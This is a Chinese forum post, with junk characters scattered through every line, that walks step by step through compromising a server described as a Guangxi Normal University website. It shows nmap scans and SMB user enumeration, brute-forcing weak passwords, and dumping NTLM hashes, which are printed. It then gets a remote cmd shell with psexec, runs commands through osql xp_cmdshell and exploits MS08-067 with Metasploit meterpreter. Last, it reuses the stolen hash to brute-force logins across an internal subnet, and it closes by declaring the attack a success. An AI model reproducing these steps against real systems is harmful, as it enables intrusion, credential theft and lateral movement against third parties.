广西师范网站http://202.103.242.241/7 G* {" j; V/ V- t6 P- w
; J6 c/ d2 r8 D: ^, D; y0 v2 oroot@bt:~# nmap -sS -sV 202.103.242.241
( }: h0 m+ e1 {* g/ u
2 f1 H: U+ R8 \, pStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
7 S- g- p( q/ ^3 t* v9 }/ x+ o1 ?0 @/ ^; {# _4 a6 P
Nmap scan report for bogon (202.103.242.241)0 W- D0 `0 P0 n0 Z' U6 Z$ ~. r
9 S2 r) e' V5 z* ]
Host is up (0.00048s latency).5 V$ p4 T8 b- F o
- `) U, V% B% p
Not shown: 993 closed ports
2 D% @7 a7 [' c! m5 J8 q$ L% v; u- x
PORT STATE SERVICE VERSION
! `2 U E% x% A; Z2 K& ^! a @
+ {! V" d' w. [135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
8 C T. x, t! N6 X- e
# H6 D* y7 A! G: ^139/tcp open netbios-ssn9 |, \' m2 _6 ~; H; a& H$ {
/ m* ^" P8 b& M! b3 }
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
* w" d' F+ P2 o; [4 N
0 U3 S X: R' K0 k1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)2 D! s. m8 ~& H
. V! I+ u# b1 I9 t2 j1026/tcp open msrpc Microsoft Windows RPC% z6 `$ h8 t( U6 y, A+ z0 f
# X& ^, c" n. O- g5 o3372/tcp open msdtc?
# W& O3 B7 ?+ l. P. v1 {6 x, W. f! P9 |+ k, }. I3 a/ M
3389/tcp open ms-term-serv?$ P) J" I# p( G( c0 h
. j7 R' ?6 N; g& o6 S: z' i6 _1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :8 K1 H9 M# t a6 \; z6 W- u- T
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r7 ~0 M$ C. _8 {1 i: A |
8 b' [' n5 M* g. sSF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions; ^0 L. e+ ], v4 X' f/ v
' x; ^* \: Q( O" G3 P* z# Q! JSF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
, s5 a4 r- _1 @: I. ]# V2 x) K$ Z2 ^% X0 {
SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO
0 a0 h$ H5 }& D! K) r& h
6 R* C3 C2 T/ E4 g+ u% WSF:ptions,6,”hO\n\x000Z”);
, t9 o* y' V3 r% @' y. c8 h/ \$ i% I! [$ t8 R2 A; u
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
6 U: w! V3 {0 P
) _% E! u3 R5 V) u' M+ y$ rService Info: OS: Windows! b) ]9 g8 y/ F1 h
- o- u7 k' N$ q/ n/ G
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
+ f4 U. ~9 L8 z/ l5 w$ K2 G6 J }) Q' X# {- K9 ?9 y
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds9 |* @4 g3 G' @& ~
# P4 W5 I5 z" g3 Nroot@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本
! S6 n0 m. {; l! c4 j1 C" ~1 R6 V$ M
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
6 {+ W# U% t( r% b) @
2 a+ a, a; U' \ p-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
# T: z: k* h8 j* I) e) O5 d9 Y
7 _# i o) z% X8 t0 H# R-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
( A# k% f \$ t0 G9 _$ {& S G( z4 h. x) ^0 d" B3 {+ ~# r
-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
* t0 |; |( J3 J% s2 G
, H4 `& z3 G) b a+ x l# b" z$ F-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse4 }* `2 c' E# ^8 ]" E: O% K
% n; l* P5 f4 y- s" j3 F9 n
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse9 G1 Y6 ]4 g; H
( v- j7 ]: S' R0 |: t
-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
- N: N# x R: Y, H4 X0 t' T
) M( l, p+ W0 n+ u% f-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
1 V' P9 t5 x# [* Z4 ^9 L5 R* a& ~8 y3 W( j9 ?& O2 J- `2 S
-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse9 E: K3 x E0 v
$ d- h2 Y$ _/ {6 `-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
4 t: c! |4 K9 A. T+ C2 }& W2 i/ Q' C( C% d; z* Q% A! P( M! c
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
- T( y7 |8 e. z6 k) T# w# v: y5 E$ B/ O# J* z$ M+ q, K" i
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse; w& G; c5 F8 q
, [5 a; ?. B3 ^: t1 y) L' k8 m
-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse) t( G8 n: H8 [: F/ I/ b) \
7 L1 V2 J* Y+ v- ]2 W-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse3 m8 j. W0 r) T
: [% C0 M% y- O8 W/ \5 k9 g4 ~-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse; n# q- T6 A. w8 |3 w
& W) `: Y- O7 R ~: mroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
: J" c7 i1 V; y$ A9 k+ R
% i: P$ v; j" a//此乃使用脚本扫描远程机器所存在的账户名! [+ s7 W4 ?% z2 l# i
8 M) W- U% w% D' G+ f' m4 G. lStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST4 s$ O8 s4 e" H6 F
& S/ i) F9 ~2 j) x' {$ g1 GNmap scan report for bogon (202.103.242.241), U1 e9 h% k. b, q# `8 w
( |( G0 o6 B% h, s! WHost is up (0.00038s latency).
+ z. h: ^- J1 d, [
. c3 G& s. J- G. U7 A* iNot shown: 993 closed ports$ o6 T, N6 e# a% v( `' P8 m
' w) G) ]7 v9 |PORT STATE SERVICE. K2 l3 H$ I+ w" E- m
% _. | ` x! |4 |1 O* ?" N135/tcp open msrpc
, R6 L1 a' \: s. w$ }9 k9 ?/ l& h- |+ d2 U
139/tcp open netbios-ssn2 v- @/ J' o9 O5 D9 w. {+ P
' C# ]7 b$ r) d [* [
445/tcp open microsoft-ds
" y/ p3 F7 z' M, E9 j% U1 ^, [$ U4 K( B4 F
1025/tcp open NFS-or-IIS1 R( b, t6 v2 s; X! N2 t2 Y0 S
! m7 w0 R5 ^; \
1026/tcp open LSA-or-nterm5 U: p& I: i) n! r0 h
* X6 @ o: L1 V1 o3372/tcp open msdtc2 [* L6 {& e& @: b N& s
! t' x3 {% {4 C! \4 _, V7 E
3389/tcp open ms-term-serv
7 B0 g- _0 x. q* B
" w! Y6 R6 e) Q( ^MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)5 v6 ?( ^4 a b1 h1 j2 Y+ P z7 L" u
3 P2 l7 V( K/ ?+ V+ _) f/ x% s( i$ SHost script results:9 o% Q# m- U% s! U5 |
# ^' Q0 a* d4 @9 ~6 ]/ r| smb-enum-users:: E: R) B3 ^- o0 _6 ]5 L" P2 B# n4 B
1 S1 B4 Q! b& p+ o5 n|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
0 b( @' x8 c: X, N( |# `# L; ]* [
. H$ ~) D. [! \1 d1 }) u1 c5 uNmap done: 1 IP address (1 host up) scanned in 1.09 seconds9 ^4 L% j# ^; w6 M3 \# p8 x
# u6 [( S- Q6 g$ ^* O! iroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 & A3 V2 r1 q( m# U' e
0 }# D& m, T- y M7 q, Q
//查看共享
( Y* w* e2 n) a
8 N* @0 T5 _4 FStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
1 L$ k2 |( Z E/ y$ @9 a" s8 v, t0 g) M$ }8 s- U h
Nmap scan report for bogon (202.103.242.241)3 N2 s. U& I& ^
# x2 k6 v+ u# Q* _; hHost is up (0.00035s latency).
+ T7 W: }; K0 r$ N" ~7 |3 X! q5 R$ X2 T9 m
Not shown: 993 closed ports# s/ O% R7 b; L" y: ^/ r. K' z
& y [) G- A+ Z9 v; A; h9 s7 ~
PORT STATE SERVICE6 }: i. y3 K' a$ M, e) N3 W7 L* Z( M
^/ i) h7 }; c+ M135/tcp open msrpc
7 h: K( w! E4 F
5 u# d2 H0 W! p0 O5 S139/tcp open netbios-ssn! b) D# }* d: ?# b$ [
+ I) w; N% H$ z7 z6 B: K
445/tcp open microsoft-ds
' n# O( d t" {4 n4 n( u& W2 j* o: [7 N" Z% k. E8 m
1025/tcp open NFS-or-IIS
) W7 m4 R( W3 x+ t& ]" O1 ]
; _8 \% U ~- [( }0 Y! j1026/tcp open LSA-or-nterm3 A) y0 @ u; X; v& k- A: D
) I$ |+ c- S& C% A4 G! @3372/tcp open msdtc' n! \ z9 `9 a) V" }
/ E" I6 E* c7 b! y. a$ b" u% s% n
3389/tcp open ms-term-serv. Q; k( ~4 R2 F
, s6 h+ M' G! N& W, A6 ^
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems), ^: }5 W7 ` ^; }7 n
9 @0 x$ V% O R* jHost script results:
# D8 r+ @7 g2 Z3 s/ y9 I+ u, k Q J$ ~. K+ U- a; K
| smb-enum-shares:
$ t2 F$ V% n3 E+ R. n
1 }4 W8 o2 a' r; r| ADMIN$8 G# a! F# z$ K3 t$ X
3 D: ], c$ u* o2 r! ~& H1 {+ E0 B| Anonymous access: <none>
4 G3 r. r) U" r, o3 A/ D1 Z( q9 W; I
) [5 S& j' l$ G| C$+ ?+ @, C# c1 h9 G, y
: q- Q& F2 R( r b
| Anonymous access: <none>
1 ?1 E: q6 L& v1 L" p: W0 _% i5 T( r ]& X* s$ F& Q( T
| IPC$9 X: ~7 T2 l7 @
9 P( |7 I- _8 ^8 F# q9 o# ~
|_ Anonymous access: READ# i9 m7 H/ J5 P
5 \( ~% A% F$ e3 J5 ?0 l
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds: _. q9 m k! r) G; E* Z
3 k1 O6 [2 ]5 N: r; @0 ?; o; j$ yroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 8 @% m4 T2 p% ?6 q+ U3 ?% k
" }/ C) A, A" m9 w% ^- _ U% ]$ y//获取用户密码
$ `6 P+ z* {. `8 \3 ?3 |+ s9 A% I, B/ A, A2 G
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST' I+ n0 l+ k! R. D5 ~
8 W& x. Q$ v7 m9 p- H% j6 ~Nmap scan report for bogon (202.103.242.2418)
+ _/ o7 m: g( Z* ]
# l3 R. X' D# L6 nHost is up (0.00041s latency).
" {. }3 U$ ~6 [' P
; T" f4 l+ _+ ^$ M" hNot shown: 993 closed ports
% M- C* o- B% x# @1 a# c
4 e6 H6 e" M2 W- |: k' ^% X% vPORT STATE SERVICE
5 @/ N( G, } e) K8 ]. t
3 z& ?4 T+ U% N9 u135/tcp open msrpc$ C! f9 w8 b k6 a
2 g7 d y3 M' L* F4 g139/tcp open netbios-ssn
+ ]+ o7 `5 U2 E- Z" }" l H; G C) { I* M2 e h# E8 c
445/tcp open microsoft-ds
: y8 }8 X. Y3 }4 O8 l0 O( R
; |) `9 ?7 _, A/ l/ Z1025/tcp open NFS-or-IIS7 ?3 Y( G9 l- P9 w" \; A* I
; g- ?6 l. C, A& a+ ^
1026/tcp open LSA-or-nterm* x! k" y' D. y# m
8 C$ L* A4 }, h) B$ P9 `, N7 O, F3372/tcp open msdtc
* Q! Q( g0 [ u! E/ {, c( {' ^: A1 `: C: l% g2 h
3389/tcp open ms-term-serv
# l2 g2 s; b3 L; I9 u8 U
! A! i+ U% t. ?1 ~7 ^8 VMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)$ \, C! O/ Z/ L- ^2 c& P
/ L c0 z+ Q/ w0 v h+ d
Host script results:
" J5 r9 K# ~+ }1 |5 N$ b; [. {4 h/ \: s5 ~
| smb-brute:
1 P- O1 d& c* `3 Y8 G/ t% a
6 E: r3 o4 `9 O j5 Y- zadministrator:<blank> => Login was successful7 d4 R O/ k3 K" f
% Y! L, \ A# L/ c. p
|_ test:123456 => Login was successful+ R6 `& x0 D+ i
8 h; S7 B" K' M# ^/ M3 }/ b- D* h) Y, J) a
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
2 T! U) H# ~- G
8 R# v; p- }6 o1 M+ R8 x2 k% @9 ]root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash' N7 u: m& f" Y6 H* `
9 g0 [- _0 \! t- z ]* zroot@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data" ~6 C& T( ]) B' O; S ]; y! y
! s( {2 [! m$ o' ]% Y; e
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse( K0 D' l3 R' Z% ^! v
: {. D5 r$ c+ R$ i) P! x: S
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139* V# X$ T7 ~, |, x
9 S* g9 h& |. s9 D
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
, ^$ Y! s. l, z/ s) \2 }, n8 r" S* z, \* y o3 W+ a3 V& X
Nmap scan report for bogon (202.103.242.241)% V+ A# ? ^% X7 t
8 X$ c1 |- K) M7 h- H' \Host is up (0.0012s latency).- T$ T1 n4 R4 L( j9 b
' P9 s; |$ o, U9 U" zPORT STATE SERVICE$ X( p5 R9 {0 ~9 V7 u0 E) M
) y# a! |+ _9 c \, z. C5 i2 s135/tcp open msrpc, P9 f6 C4 r0 y1 m
% j! @4 @4 c0 Z1 G
139/tcp open netbios-ssn" n6 n, |5 W# C# I
8 H% [9 G) v) O* a6 p* f445/tcp open microsoft-ds$ u# y! r- J* a$ h% A3 F2 [
; x( K. R3 w) EMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)! N7 k r5 a: ]8 g
' [$ P6 P/ N3 M. v- k2 s
Host script results:' L( @0 m. t0 ^+ K: I
- D% H+ e1 C! G| smb-pwdump:0 Y. |* W$ V/ T- j, P; J2 x7 e8 |
* t6 J1 J+ u) V% f: R9 N# M; y$ K| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************0 z. x: q, I# a- q! x3 p
* p6 J k |* n# D# d1 E| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************% u7 u+ x) H) L! {5 g/ t% [
$ I7 g, F3 ?# |: m| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D40 K& o+ s- N3 f+ S- a+ G) J% L
+ J$ [' z; Z9 z& Z+ a1 X|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
S3 G0 q& U1 H' N
3 z* k" Q. I3 ]' G2 P( @Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
! A. K2 c; I0 X( |5 G) ]+ f9 }" O) G1 \7 ~3 Y, P; ^) m
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell ^' R2 `- B5 O& Y- L2 }3 O r% y
x6 ^/ h3 I/ y) v0 m-p 123456 -e cmd.exe
+ u: O" M% H% T2 l: i8 O
# Q. J- U+ D3 n2 _; `1 oPsExec v1.55 – Execute processes remotely
" L5 Z! z; q2 X3 i0 S: e% T- ~- e( Q; r* c& F g! h% P
Copyright (C) 2001-2004 Mark Russinovich7 ]9 j+ n- @( V7 V9 t- P- U
* x& C, [& G6 _
Sysinternals – www.sysinternals.com1 Q) O: z& b- [! ]( J
: C& ?) S& N1 V$ v1 N
Microsoft Windows 2000 [Version 5.00.2195]
3 y5 J7 T1 r3 F5 y
1 D! r( x3 ^2 a0 y3 u(C) 版权所有 1985-2000 Microsoft Corp.
& T% a# W/ T: l3 @; r
3 N& S! x7 |' \C:\WINNT\system32>ipconfig' i4 {9 q8 [. N: q+ G, d$ l; A
6 R: X c x# {2 z: g0 `# A
Windows 2000 IP Configuration" D7 \/ T: L' `3 s( T8 h6 X
2 H6 ~6 K! T: Q- q+ i; D
Ethernet adapter 本地连接:
5 h/ J3 a$ z. X6 O3 D2 ~. S
* H2 z, Z$ C- d3 s$ _, d. EConnection-specific DNS Suffix . :: U& t D2 n q; P. Z/ o L/ e
: i% j' t4 _8 |: U
IP Address. . . . . . . . . . . . : 202.103.242.241+ u2 q' e5 n+ c* f. A4 K
5 R( E5 d) W. y( _
Subnet Mask . . . . . . . . . . . : 255.255.255.01 p7 A( B# {; v$ g1 M4 Q
) ]( B# a; }0 f5 ?! xDefault Gateway . . . . . . . . . : 202.103.1.1+ R5 N. X1 G% ?* W
7 s- r7 f& z) M0 F5 ^ @' z& G oC:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令/ l2 P, @$ I% ^6 \
4 |* H2 s# v8 t. G9 D) f3 T/ h$ a
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
- A2 y/ G+ Y# {
2 O1 N! R$ A6 h8 q5 pStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST: v& ]9 s& g2 [! {4 ~" X8 [& _9 b
- }5 r8 D6 C' L
Nmap scan report for bogon (202.103.242.241)
- K$ Y) r8 v. b2 u7 O5 H5 |) K! K. z
Host is up (0.00046s latency).
7 O$ ]9 n: U( A6 B
. h- ]: X6 G1 T: f$ N7 M( R: rNot shown: 993 closed ports
2 P* P3 l) y5 t1 Y' X9 X3 L4 a9 c" ]2 N$ F: V! L- Z
PORT STATE SERVICE
: t$ b9 E9 u* M" }4 t
* L: y8 B* I: z- o( H% C. ~# F135/tcp open msrpc
& c* g C' m" O2 L3 a5 v0 F: |- v% h9 g3 p( w9 _- R
139/tcp open netbios-ssn
" ^ { K1 s$ T8 m5 Y: T* |
4 D& L9 o0 x. Y& B445/tcp open microsoft-ds
1 A3 ~0 h7 _2 C3 ^, L
! o1 r, y' f( M" a1025/tcp open NFS-or-IIS9 H* ?$ {( w# E: _
8 m! G6 ~+ [; Y" C; n& d5 }# i
1026/tcp open LSA-or-nterm
. _6 U4 S+ ~9 d1 e- f- A
* M$ @+ w k1 M) K4 X& X) Z3372/tcp open msdtc3 L& |( m- g9 F4 E$ l! v
! J% K# ]/ k# Z, L( T
3389/tcp open ms-term-serv* J, N8 Q# Q/ U7 e4 G
/ ~8 a b, |4 R- P2 R' z
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
+ \% c8 P6 ]& u1 o- ^( }- x; m
4 }3 s+ j4 P, q7 ^Host script results:4 v' t4 B2 b) W7 B- P4 _
0 r( |( x0 `0 P; j7 c1 v, ?
| smb-check-vulns:
6 Y- e4 \+ O+ q
8 x" J2 N( m# {# p' y|_ MS08-067: VULNERABLE
5 H, D0 v% s7 S, U$ o8 ?. [4 p* X: D
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds7 D" G$ |9 B8 T0 g! s0 Y9 t
1 r1 o) y! u" H9 X& e I7 i
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
, o; P) A: S% s3 a
, T* p. j& J2 R, B! Rmsf > search ms08- g6 y9 G' [; Q, t
0 D. w. n6 D3 V8 ~
msf > use exploit/windows/smb/ms08_067_netapi
. |/ m$ t0 H0 a# T9 Z K! x; u7 S! F0 k! Z' c. ~5 }
msf exploit(ms08_067_netapi) > show options
5 b: \) Q) c4 C! s
; @ N4 B& I' Q& T2 b7 lmsf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
/ E# c2 J& i% `9 J* i$ n! }* b: U/ L: q
msf exploit(ms08_067_netapi) > show payloads4 @! l# h- }7 f6 Y
. b2 a/ U/ F! L" d+ o% Amsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp* t9 W4 U/ J ~/ N' j
# t/ x7 `: u7 t* p9 x6 i2 l' smsf exploit(ms08_067_netapi) > exploit
& f; N- N# ?. v1 Y8 R
- @9 Q) R, J) umeterpreter >% \7 z7 r- H- q' o7 w9 D+ s
; U$ X! |# o: q `
Background session 2? [y/N] (ctrl+z)6 V7 a! c. ^6 M9 q. I0 Q
7 C- E8 E" l C" Ymsf exploit(ms08_067_netapi) > sessions -l4 L; ?& F$ x; y* `# _' S3 _
- `! x+ T+ ?1 O5 hroot@bt:/usr/local/share/nmap/scripts# vim usernames.txt7 y( s4 q* {& R/ C8 Y5 O1 y4 w
- D" e% E: ^4 b4 v' c* ~
test* S h9 o0 M7 S) G6 I9 K
0 L8 [; S& c6 Q) V6 V2 n: |
administrator* i; M5 M9 Y% t
+ M7 S* K% F& @4 Z* s$ kroot@bt:/usr/local/share/nmap/scripts# vim password.txt
+ e/ n0 U9 [) e+ f" J! ~ I
7 @! ], d& }1 @44EFCE164AB921CAAAD3B435B51404EE6 ~! D U0 i0 W/ w/ y$ W, j
# h* {6 j2 `* s$ P6 E4 M) l
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 3 a6 y8 A" l& s9 l
9 ]' H v/ |: h! e, E //利用用户名跟获取的hash尝试对整段内网进行登录9 q6 e( G% S% z9 Y
: |# C: A& Q, s1 { p: ^$ L1 jNmap scan report for 192.168.1.105
- J& n) F$ {7 I# P* K& M& p9 U9 n) t+ h: H
Host is up (0.00088s latency).
) v a0 M3 p& t z) {) J0 f' ^; ?5 ] ?/ N. a
Not shown: 993 closed ports: |5 a% v) ?* o
! F# A) o" b7 V" ~; iPORT STATE SERVICE
. r( l$ i9 r+ }* {; F& t# g2 H
4 A. n" W; l$ Q: Y135/tcp open msrpc
J) @: M2 J: A7 a ^1 }: ^4 x# @, Y3 R7 x6 u4 Q
139/tcp open netbios-ssn4 ^6 j- g6 T) T8 F4 A: a4 `3 e
- o, Q7 i+ }" ]) `( ^" ]445/tcp open microsoft-ds
( t4 W. N4 J5 H( e& M# h0 j3 l( q( r, h8 s$ L
1025/tcp open NFS-or-IIS
+ R' [+ z) z+ [/ M" X
/ p& m3 O# F: D1 n# p. ^1026/tcp open LSA-or-nterm
) d8 A. D) l" a9 k* U' i/ b/ P6 N4 K9 L( ]$ V
3372/tcp open msdtc4 V4 Y. q2 G& V
3 \1 J; q9 P. _+ C8 [- S
3389/tcp open ms-term-serv
) g( g+ X2 ~. f8 t, k |5 S
2 e; H5 q$ H$ _; z% Y" qMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)4 K9 D( ~/ w, Z4 L/ n9 u
) O, Y0 @5 X/ n$ i
Host script results:! O' U5 h1 e. n: @
9 N! K. k9 }* l. @! p6 e
| smb-brute:
7 p c$ D- B+ S, Q4 } R+ C. w) ^$ H0 U9 ^7 `. f, n
|_ administrator:<blank> => Login was successful+ j9 p1 u9 i$ y$ C9 B% I- `
, }% }2 ~' j- i. D5 R8 B/ ~
攻击成功,一个简单的msf+nmap攻击~~·$ [1 E2 r1 U' K3 x
* t# \' a6 H7 \* S. O" W+ f |
发表于 2012-12-4 12:46:42
收藏
支持
反对